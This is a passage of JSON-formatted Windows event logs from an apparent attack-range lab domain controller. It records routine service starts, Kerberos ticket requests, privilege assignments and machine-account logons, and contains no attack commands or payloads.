C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.812","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76827,"ProcessID":856,"ThreadID":940,"Channel":"System","Message":"The DNS service entered the running state.","param1":"DNS","param2":"running","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220309,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tSupplied Realm Name:\tATTACKRANGE.LOCAL\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-1008","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220310,"ProcessID":864,"ThreadID":2364,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tSupplied Realm Name:\tATTACKRANGE.LOCAL\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-1008","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220311,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-881393$@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{6C72D3DA-DD4C-4441-93C2-8AADEFB46786}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"WIN-DC-881393$@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{6C72D3DA-DD4C-4441-93C2-8AADEFB46786}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220312,"ProcessID":864,"ThreadID":2364,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-881393$@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{6C72D3DA-DD4C-4441-93C2-8AADEFB46786}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"WIN-DC-881393$@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{6C72D3DA-DD4C-4441-93C2-8AADEFB46786}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220313,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x444A8\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x444a8","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220314,"ProcessID":864,"ThreadID":1544,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x444A9\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x444a9","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220315,"ProcessID":864,"ThreadID":1544,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x444A9\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t49693\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x444a9","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"49693","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220316,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x444A8\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::3413:3332:6143:4f60\r\n\tSource Port:\t\t49694\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x444a8","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::3413:3332:6143:4f60","IpPort":"49694","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220317,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-881393$@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{6C72D3DA-DD4C-4441-93C2-8AADEFB46786}\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x60810010\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"WIN-DC-881393$@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x60810010","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{6C72D3DA-DD4C-4441-93C2-8AADEFB46786}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220318,"ProcessID":864,"ThreadID":3084,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x44735\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x44735","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220319,"ProcessID":864,"ThreadID":3084,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tDelegation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x44735\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::3413:3332:6143:4f60\r\n\tSource Port:\t\t49695\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was 